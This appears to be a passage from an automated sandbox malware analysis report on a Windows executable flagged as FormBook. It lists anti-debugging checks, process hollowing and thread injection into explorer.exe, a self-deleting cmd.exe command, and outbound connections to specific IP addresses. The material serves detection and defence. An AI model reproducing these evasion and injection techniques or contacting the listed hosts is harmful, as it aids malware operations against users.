        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76DAC0 mov eax, dword ptr fs:[00000030h]7_2_1D76DAC0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76DAC0 mov eax, dword ptr fs:[00000030h]7_2_1D76DAC0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76DAC0 mov eax, dword ptr fs:[00000030h]7_2_1D76DAC0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76DAC0 mov eax, dword ptr fs:[00000030h]7_2_1D76DAC0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7E7ABE mov eax, dword ptr fs:[00000030h]7_2_1D7E7ABE
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D779ABF mov eax, dword ptr fs:[00000030h]7_2_1D779ABF
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D779ABF mov eax, dword ptr fs:[00000030h]7_2_1D779ABF
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D779ABF mov eax, dword ptr fs:[00000030h]7_2_1D779ABF
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FDAAF mov eax, dword ptr fs:[00000030h]7_2_1D7FDAAF
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80BA66 mov eax, dword ptr fs:[00000030h]7_2_1D80BA66
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80BA66 mov eax, dword ptr fs:[00000030h]7_2_1D80BA66
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80BA66 mov eax, dword ptr fs:[00000030h]7_2_1D80BA66
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80BA66 mov eax, dword ptr fs:[00000030h]7_2_1D80BA66
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73BA80 mov eax, dword ptr fs:[00000030h]7_2_1D73BA80
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7C9567 mov eax, dword ptr fs:[00000030h]7_2_1D7C9567
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D743536 mov eax, dword ptr fs:[00000030h]7_2_1D743536
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D743536 mov eax, dword ptr fs:[00000030h]7_2_1D743536
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73753F mov eax, dword ptr fs:[00000030h]7_2_1D73753F
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73753F mov eax, dword ptr fs:[00000030h]7_2_1D73753F
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73753F mov eax, dword ptr fs:[00000030h]7_2_1D73753F
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D771527 mov eax, dword ptr fs:[00000030h]7_2_1D771527
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77F523 mov eax, dword ptr fs:[00000030h]7_2_1D77F523
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D761514 mov eax, dword ptr fs:[00000030h]7_2_1D761514
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D761514 mov eax, dword ptr fs:[00000030h]7_2_1D761514
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D761514 mov eax, dword ptr fs:[00000030h]7_2_1D761514
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D761514 mov eax, dword ptr fs:[00000030h]7_2_1D761514
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D761514 mov eax, dword ptr fs:[00000030h]7_2_1D761514
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D761514 mov eax, dword ptr fs:[00000030h]7_2_1D761514
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EF51B mov eax, dword ptr fs:[00000030h]7_2_1D7EF51B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EF51B mov eax, dword ptr fs:[00000030h]7_2_1D7EF51B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EF51B mov eax, dword ptr fs:[00000030h]7_2_1D7EF51B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EF51B mov eax, dword ptr fs:[00000030h]7_2_1D7EF51B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EF51B mov eax, dword ptr fs:[00000030h]7_2_1D7EF51B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EF51B mov eax, dword ptr fs:[00000030h]7_2_1D7EF51B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EF51B mov ecx, dword ptr fs:[00000030h]7_2_1D7EF51B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EF51B mov ecx, dword ptr fs:[00000030h]7_2_1D7EF51B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EF51B mov eax, dword ptr fs:[00000030h]7_2_1D7EF51B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EF51B mov eax, dword ptr fs:[00000030h]7_2_1D7EF51B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EF51B mov eax, dword ptr fs:[00000030h]7_2_1D7EF51B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EF51B mov eax, dword ptr fs:[00000030h]7_2_1D7EF51B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EF51B mov eax, dword ptr fs:[00000030h]7_2_1D7EF51B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73B502 mov eax, dword ptr fs:[00000030h]7_2_1D73B502
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7F550D mov eax, dword ptr fs:[00000030h]7_2_1D7F550D
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7F550D mov eax, dword ptr fs:[00000030h]7_2_1D7F550D
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7F550D mov eax, dword ptr fs:[00000030h]7_2_1D7F550D
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74B5E0 mov eax, dword ptr fs:[00000030h]7_2_1D74B5E0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74B5E0 mov eax, dword ptr fs:[00000030h]7_2_1D74B5E0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74B5E0 mov eax, dword ptr fs:[00000030h]7_2_1D74B5E0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74B5E0 mov eax, dword ptr fs:[00000030h]7_2_1D74B5E0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74B5E0 mov eax, dword ptr fs:[00000030h]7_2_1D74B5E0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74B5E0 mov eax, dword ptr fs:[00000030h]7_2_1D74B5E0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7715EF mov eax, dword ptr fs:[00000030h]7_2_1D7715EF
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7C55E0 mov eax, dword ptr fs:[00000030h]7_2_1D7C55E0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7CB5D3 mov eax, dword ptr fs:[00000030h]7_2_1D7CB5D3
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F5C7 mov eax, dword ptr fs:[00000030h]7_2_1D73F5C7
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F5C7 mov eax, dword ptr fs:[00000030h]7_2_1D73F5C7
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F5C7 mov eax, dword ptr fs:[00000030h]7_2_1D73F5C7
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F5C7 mov eax, dword ptr fs:[00000030h]7_2_1D73F5C7
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F5C7 mov eax, dword ptr fs:[00000030h]7_2_1D73F5C7
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F5C7 mov eax, dword ptr fs:[00000030h]7_2_1D73F5C7
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F5C7 mov eax, dword ptr fs:[00000030h]7_2_1D73F5C7
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F5C7 mov eax, dword ptr fs:[00000030h]7_2_1D73F5C7
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F5C7 mov eax, dword ptr fs:[00000030h]7_2_1D73F5C7
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D81B55F mov eax, dword ptr fs:[00000030h]7_2_1D81B55F
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D81B55F mov eax, dword ptr fs:[00000030h]7_2_1D81B55F
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7E7591 mov edi, dword ptr fs:[00000030h]7_2_1D7E7591
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D779580 mov eax, dword ptr fs:[00000030h]7_2_1D779580
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D779580 mov eax, dword ptr fs:[00000030h]7_2_1D779580
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FF582 mov eax, dword ptr fs:[00000030h]7_2_1D7FF582
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FF478 mov eax, dword ptr fs:[00000030h]7_2_1D7FF478
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74D454 mov eax, dword ptr fs:[00000030h]7_2_1D74D454
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74D454 mov eax, dword ptr fs:[00000030h]7_2_1D74D454
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74D454 mov eax, dword ptr fs:[00000030h]7_2_1D74D454
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74D454 mov eax, dword ptr fs:[00000030h]7_2_1D74D454
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74D454 mov eax, dword ptr fs:[00000030h]7_2_1D74D454
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74D454 mov eax, dword ptr fs:[00000030h]7_2_1D74D454
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77D450 mov eax, dword ptr fs:[00000030h]7_2_1D77D450
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77D450 mov eax, dword ptr fs:[00000030h]7_2_1D77D450
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FD430 mov eax, dword ptr fs:[00000030h]7_2_1D7FD430
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FD430 mov eax, dword ptr fs:[00000030h]7_2_1D7FD430
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D777425 mov eax, dword ptr fs:[00000030h]7_2_1D777425
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D777425 mov ecx, dword ptr fs:[00000030h]7_2_1D777425
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7CF42F mov eax, dword ptr fs:[00000030h]7_2_1D7CF42F
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7CF42F mov eax, dword ptr fs:[00000030h]7_2_1D7CF42F
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7CF42F mov eax, dword ptr fs:[00000030h]7_2_1D7CF42F
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7CF42F mov eax, dword ptr fs:[00000030h]7_2_1D7CF42F
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7CF42F mov eax, dword ptr fs:[00000030h]7_2_1D7CF42F
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73B420 mov eax, dword ptr fs:[00000030h]7_2_1D73B420
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7C9429 mov eax, dword ptr fs:[00000030h]7_2_1D7C9429
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7DB420 mov eax, dword ptr fs:[00000030h]7_2_1D7DB420
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7DB420 mov eax, dword ptr fs:[00000030h]7_2_1D7DB420
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FF409 mov eax, dword ptr fs:[00000030h]7_2_1D7FF409
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FF4FD mov eax, dword ptr fs:[00000030h]7_2_1D7FF4FD
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7694FA mov eax, dword ptr fs:[00000030h]7_2_1D7694FA
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7754E0 mov eax, dword ptr fs:[00000030h]7_2_1D7754E0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76F4D0 mov eax, dword ptr fs:[00000030h]7_2_1D76F4D0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76F4D0 mov eax, dword ptr fs:[00000030h]7_2_1D76F4D0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76F4D0 mov eax, dword ptr fs:[00000030h]7_2_1D76F4D0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76F4D0 mov eax, dword ptr fs:[00000030h]7_2_1D76F4D0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76F4D0 mov eax, dword ptr fs:[00000030h]7_2_1D76F4D0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76F4D0 mov eax, dword ptr fs:[00000030h]7_2_1D76F4D0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76F4D0 mov eax, dword ptr fs:[00000030h]7_2_1D76F4D0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76F4D0 mov eax, dword ptr fs:[00000030h]7_2_1D76F4D0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76F4D0 mov eax, dword ptr fs:[00000030h]7_2_1D76F4D0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7614C9 mov eax, dword ptr fs:[00000030h]7_2_1D7614C9
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7614C9 mov eax, dword ptr fs:[00000030h]7_2_1D7614C9
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7614C9 mov eax, dword ptr fs:[00000030h]7_2_1D7614C9
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7614C9 mov eax, dword ptr fs:[00000030h]7_2_1D7614C9
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7614C9 mov eax, dword ptr fs:[00000030h]7_2_1D7614C9
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7F54B0 mov eax, dword ptr fs:[00000030h]7_2_1D7F54B0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7F54B0 mov ecx, dword ptr fs:[00000030h]7_2_1D7F54B0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7CD4A0 mov ecx, dword ptr fs:[00000030h]7_2_1D7CD4A0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7CD4A0 mov eax, dword ptr fs:[00000030h]7_2_1D7CD4A0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7CD4A0 mov eax, dword ptr fs:[00000030h]7_2_1D7CD4A0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77B490 mov eax, dword ptr fs:[00000030h]7_2_1D77B490
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77B490 mov eax, dword ptr fs:[00000030h]7_2_1D77B490
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D81B781 mov eax, dword ptr fs:[00000030h]7_2_1D81B781
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D81B781 mov eax, dword ptr fs:[00000030h]7_2_1D81B781
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D781763 mov eax, dword ptr fs:[00000030h]7_2_1D781763
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D781763 mov eax, dword ptr fs:[00000030h]7_2_1D781763
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D781763 mov eax, dword ptr fs:[00000030h]7_2_1D781763
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D781763 mov eax, dword ptr fs:[00000030h]7_2_1D781763
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D781763 mov eax, dword ptr fs:[00000030h]7_2_1D781763
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D781763 mov eax, dword ptr fs:[00000030h]7_2_1D781763
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80D7A7 mov eax, dword ptr fs:[00000030h]7_2_1D80D7A7
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80D7A7 mov eax, dword ptr fs:[00000030h]7_2_1D80D7A7
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80D7A7 mov eax, dword ptr fs:[00000030h]7_2_1D80D7A7
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F75B mov eax, dword ptr fs:[00000030h]7_2_1D73F75B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F75B mov eax, dword ptr fs:[00000030h]7_2_1D73F75B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F75B mov eax, dword ptr fs:[00000030h]7_2_1D73F75B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F75B mov eax, dword ptr fs:[00000030h]7_2_1D73F75B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F75B mov eax, dword ptr fs:[00000030h]7_2_1D73F75B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F75B mov eax, dword ptr fs:[00000030h]7_2_1D73F75B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F75B mov eax, dword ptr fs:[00000030h]7_2_1D73F75B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F75B mov eax, dword ptr fs:[00000030h]7_2_1D73F75B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F75B mov eax, dword ptr fs:[00000030h]7_2_1D73F75B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D773740 mov eax, dword ptr fs:[00000030h]7_2_1D773740
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7C174B mov eax, dword ptr fs:[00000030h]7_2_1D7C174B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7C174B mov ecx, dword ptr fs:[00000030h]7_2_1D7C174B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77174A mov eax, dword ptr fs:[00000030h]7_2_1D77174A
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D8117BC mov eax, dword ptr fs:[00000030h]7_2_1D8117BC
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D769723 mov eax, dword ptr fs:[00000030h]7_2_1D769723
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FF717 mov eax, dword ptr fs:[00000030h]7_2_1D7FF717
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74D700 mov ecx, dword ptr fs:[00000030h]7_2_1D74D700
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73B705 mov eax, dword ptr fs:[00000030h]7_2_1D73B705
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73B705 mov eax, dword ptr fs:[00000030h]7_2_1D73B705
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73B705 mov eax, dword ptr fs:[00000030h]7_2_1D73B705
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73B705 mov eax, dword ptr fs:[00000030h]7_2_1D73B705
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80970B mov eax, dword ptr fs:[00000030h]7_2_1D80970B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80970B mov eax, dword ptr fs:[00000030h]7_2_1D80970B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7477F9 mov eax, dword ptr fs:[00000030h]7_2_1D7477F9
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7477F9 mov eax, dword ptr fs:[00000030h]7_2_1D7477F9
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7437E4 mov eax, dword ptr fs:[00000030h]7_2_1D7437E4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782D10 NtQuerySystemInformation,LdrInitializeThunk,7_2_1D782D10

        HIPS / PFW / Operating System Protection Evasion

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exeNetwork Connect: 68.65.122.211 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 41.203.18.177 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 192.64.117.165 80Jump to behavior
        Sample uses process hollowing technique
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 8A0000Jump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeThread register set: target process: 4660Jump to behavior
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeThread register set: target process: 4660Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 4660Jump to behavior
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeProcess created: C:\Users\user\Desktop\aSsc9zh1ex.exe "C:\Users\user\Desktop\aSsc9zh1ex.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\aSsc9zh1ex.exe"Jump to behavior
        Source: explorer.exe, 0000000A.00000000.42163306046.0000000001A00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.41902575536.0000000001A00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.42029820941.0000000001A00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
        Source: explorer.exe, 0000000A.00000000.42173257906.0000000005080000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42163306046.0000000001A00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.41928581843.000000000DA0B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 0000000A.00000000.42163306046.0000000001A00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.41902575536.0000000001A00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.42029820941.0000000001A00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: explorer.exe, 0000000A.00000000.41900925588.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41960830170.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42027095503.00000000013F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman?
        Source: explorer.exe, 0000000A.00000000.42163306046.0000000001A00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.41902575536.0000000001A00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.42029820941.0000000001A00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 1_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040350A

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 0000000A.00000000.42010338948.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.46595730295.00000000043D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000000.42080260452.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.42265914211.000000001D3A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.42240670582.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.46596157164.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 0000000A.00000000.42010338948.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.46595730295.00000000043D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000000.42080260452.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
